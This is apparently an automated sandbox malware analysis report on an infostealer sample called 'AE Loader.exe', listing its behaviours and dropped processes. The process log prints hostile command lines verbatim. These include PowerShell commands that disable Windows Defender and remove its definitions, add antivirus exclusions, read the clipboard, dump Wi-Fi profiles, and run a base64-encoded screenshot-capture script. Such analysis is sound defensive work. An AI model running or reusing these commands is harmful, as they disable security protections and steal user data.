Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-cjebpssgpl
Target AE Loader.exe
SHA256 922eedd1532bbc6b06b9c3d93b0c6207b0da565bb7fb511740010304fda56a6e
Tags
collection credential_access defense_evasion discovery evasion execution pyinstaller spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

922eedd1532bbc6b06b9c3d93b0c6207b0da565bb7fb511740010304fda56a6e

Threat Level: Known bad

The file AE Loader.exe was found to be: Known bad.

Malicious Activity Summary

collection credential_access defense_evasion discovery evasion execution pyinstaller spyware stealer upx

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Contacts a large (947) amount of remote hosts

Loads dropped DLL

Checks computer location settings

Unsecured Credentials: Credentials In Files

Clipboard Data

Executes dropped EXE

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

UPX packed file

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Modifies registry key

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Gathers system information

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 02:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 02:06

Reported

2024-11-05 02:08

Platform

win10v2004-20241007-en

Max time kernel

35s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Contacts a large (947) amount of remote hosts

discovery

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\AE Loader.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AE Loader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\hacn.exe
PID 2084 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\hacn.exe
PID 2084 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\based.exe
PID 2084 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\based.exe
PID 2880 wrote to memory of 2428 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 2880 wrote to memory of 2428 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 4480 wrote to memory of 5116 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 4480 wrote to memory of 5116 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 5116 wrote to memory of 3200 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 5116 wrote to memory of 3200 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
PID 3200 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
PID 3200 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
PID 2428 wrote to memory of 692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3212 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3212 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1640 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1640 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4980 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4980 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3448 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3448 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 3212 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\AE Loader.exe

"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\ProgramData\crss.exe

"C:\ProgramData\crss.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\ProgramData\crss.exe

"C:\ProgramData\crss.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

